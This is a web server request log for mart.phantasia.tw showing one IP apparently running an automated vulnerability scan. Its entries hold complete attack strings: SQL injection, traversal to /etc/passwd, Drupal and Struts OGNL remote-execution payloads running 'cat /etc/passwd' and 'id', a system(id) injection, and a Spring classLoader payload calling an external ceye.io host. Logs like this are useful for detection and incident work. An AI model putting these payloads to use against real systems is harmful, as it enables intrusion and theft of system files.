| time |
PFID |
IP |
controller |
view |
variable |
device |
url |
post |
get |
source |
sourceName |
type |
| 2022-10-03 22:02:02 |
0
|
180.138.61.183
|
|
|
|
desktop
|
https://mart.phantasia.tw/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml(0x23,concat(1,md5(8888)),1)
|
[]
|
{"option":"com_fields","view":"fields","layout":"modal","list":{"fullordering":"updatexml(0x23,concat(1,md5(8888)),1)"}}
|
|
|
0
|
| 2022-10-03 22:02:43 |
0
|
180.138.61.183
|
|
|
|
desktop
|
https://mart.phantasia.tw/
|
[]
|
[]
|
|
|
0
|
| 2022-10-03 22:07:00 |
0
|
180.138.61.183
|
|
|
|
desktop
|
https://mart.phantasia.tw/index.php?target=db_sql.php%253f/../../../../../../../../etc/passwd
|
[]
|
{"target":"db_sql.php%3f\/..\/..\/..\/..\/..\/..\/..\/..\/etc\/passwd"}
|
|
|
0
|
| 2022-10-03 22:09:18 |
0
|
180.138.61.183
|
|
|
|
desktop
|
https://mart.phantasia.tw/index.php?option=com_zhbaidumap&no_html=1&format=raw&task=getPlacemarkDetails
|
{"id":"-1 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,md5(2069970923),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- "}
|
{"option":"com_zhbaidumap","no_html":"1","format":"raw","task":"getPlacemarkDetails"}
|
|
|
0
|
| 2022-10-03 22:10:06 |
0
|
180.138.61.183
|
|
|
|
desktop
|
https://mart.phantasia.tw/?q=user/password&name[%23post_render][]=printf&name[%23type]=markup&name[%23markup]=fqgx%25%25fgoz
|
{"form_id":"user_pass","_triggering_element_name":"name","_triggering_element_value":"","opz":"E-mail new Password"}
|
{"q":"user\/password","name":["fqgx%%fgoz"]}
|
|
|
0
|
| 2022-10-03 22:10:09 |
0
|
180.138.61.183
|
|
|
|
desktop
|
https://mart.phantasia.tw/?q=file%2Fajax%2Fname%2F%23value%2F{{build_id}}
|
{"form_build_id":"{{build_id}}"}
|
{"q":"file\/ajax\/name\/#value\/{{build_id}}"}
|
|
|
0
|
| 2022-10-03 22:11:11 |
0
|
180.138.61.183
|
|
|
|
desktop
|
https://mart.phantasia.tw/
|
[]
|
[]
|
|
|
0
|
| 2022-10-03 22:12:20 |
0
|
180.138.61.183
|
|
|
|
desktop
|
https://mart.phantasia.tw/?id=afrogtest%25{128*128}
|
[]
|
{"id":"afrogtest%{128*128}"}
|
|
|
0
|
| 2022-10-03 22:15:29 |
0
|
180.138.61.183
|
|
|
|
desktop
|
https://mart.phantasia.tw/
|
[]
|
[]
|
|
|
0
|
| 2022-10-03 22:25:01 |
0
|
180.138.61.183
|
|
|
|
desktop
|
https://mart.phantasia.tw/
|
[]
|
[]
|
|
|
0
|
| 2022-10-03 22:28:02 |
0
|
180.138.61.183
|
|
|
|
desktop
|
https://mart.phantasia.tw/?id=%25%7B%28%23instancemanager%3D%23application%5B%22org.apache.tomcat.InstanceManager%22%5D%29.%28%23stack%3D%23attr%5B%22com.opensymphony.xwork2.util.ValueStack.ValueStack%22%5D%29.%28%23bean%3D%23instancemanager.newInstance%28%22org.apache.commons.collections.BeanMap%22%29%29.%28%23bean.setBean%28%23stack%29%29.%28%23context%3D%23bean.get%28%22context%22%29%29.%28%23bean.setBean%28%23context%29%29.%28%23macc%3D%23bean.get%28%22memberAccess%22%29%29.%28%23bean.setBean%28%23macc%29%29.%28%23emptyset%3D%23instancemanager.newInstance%28%22java.util.HashSet%22%29%29.%28%23bean.put%28%22excludedClasses%22%2C%23emptyset%29%29.%28%23bean.put%28%22excludedPackageNames%22%2C%23emptyset%29%29.%28%23arglist%3D%23instancemanager.newInstance%28%22java.util.ArrayList%22%29%29.%28%23arglist.add%28%22cat%20%2Fetc%2Fpasswd%22%29%29.%28%23execute%3D%23instancemanager.newInstance%28%22freemarker.template.utility.Execute%22%29%29.%28%23execute.exec%28%23arglist%29%29%7D
|
[]
|
{"id":"%{(#instancemanager=#application[\"org.apache.tomcat.InstanceManager\"]).(#stack=#attr[\"com.opensymphony.xwork2.util.ValueStack.ValueStack\"]).(#bean=#instancemanager.newInstance(\"org.apache.commons.collections.BeanMap\")).(#bean.setBean(#stack)).(#context=#bean.get(\"context\")).(#bean.setBean(#context)).(#macc=#bean.get(\"memberAccess\")).(#bean.setBean(#macc)).(#emptyset=#instancemanager.newInstance(\"java.util.HashSet\")).(#bean.put(\"excludedClasses\",#emptyset)).(#bean.put(\"excludedPackageNames\",#emptyset)).(#arglist=#instancemanager.newInstance(\"java.util.ArrayList\")).(#arglist.add(\"cat \/etc\/passwd\")).(#execute=#instancemanager.newInstance(\"freemarker.template.utility.Execute\")).(#execute.exec(#arglist))}"}
|
|
|
0
|
| 2022-10-03 22:31:21 |
0
|
180.138.61.183
|
|
|
|
desktop
|
https://mart.phantasia.tw/
|
[]
|
[]
|
|
|
0
|
| 2022-10-03 22:40:26 |
0
|
180.138.61.183
|
|
|
|
desktop
|
https://mart.phantasia.tw/index.php
|
{"SPOOLDIR":"test\".system(id).\"","recheck":"Recheck"}
|
[]
|
|
|
0
|
| 2022-10-03 22:41:11 |
0
|
180.138.61.183
|
|
|
|
desktop
|
https://mart.phantasia.tw/
|
{"id":"%{(#request.map=#@org.apache.commons.collections.BeanMap@{}).toString().substring(0,0) +(#request.map.setBean(#request.get('struts.valueStack')) == true).toString().substring(0,0) +(#request.map2=#@org.apache.commons.collections.BeanMap@{}).toString().substring(0,0) +(#request.map2.setBean(#request.get('map').get('context')) == true).toString().substring(0,0) +(#request.map3=#@org.apache.commons.collections.BeanMap@{}).toString().substring(0,0) +(#request.map3.setBean(#request.get('map2').get('memberAccess')) == true).toString().substring(0,0) +(#request.get('map3').put('excludedPackageNames',#@org.apache.commons.collections.BeanMap@{}.keySet()) == true).toString().substring(0,0) +(#request.get('map3').put('excludedClasses',#@org.apache.commons.collections.BeanMap@{}.keySet()) == true).toString().substring(0,0) +(#application.get('org.apache.tomcat.InstanceManager').newInstance('freemarker.template.utility.Execute').exec({'id'}))}"}
|
[]
|
|
|
0
|
| 2022-10-03 22:42:58 |
0
|
180.138.61.183
|
|
|
|
desktop
|
https://mart.phantasia.tw/
|
[]
|
[]
|
|
|
0
|
| 2022-10-03 22:50:50 |
0
|
180.138.61.183
|
|
|
|
desktop
|
https://mart.phantasia.tw/?class.module.classLoader.resources.context.configFile=https://Zqelp9NaNxwO.dflqxk.ceye.io&class.module.classLoader.resources.context.configFile.content.aaa=xxx
|
[]
|
{"class_module_classLoader_resources_context_configFile":"https:\/\/Zqelp9NaNxwO.dflqxk.ceye.io","class_module_classLoader_resources_context_configFile_content_aaa":"xxx"}
|
|
|
0
|
| 2022-10-03 22:59:37 |
0
|
180.138.61.183
|
|
|
|
desktop
|
https://mart.phantasia.tw/
|
[]
|
[]
|
|
|
0
|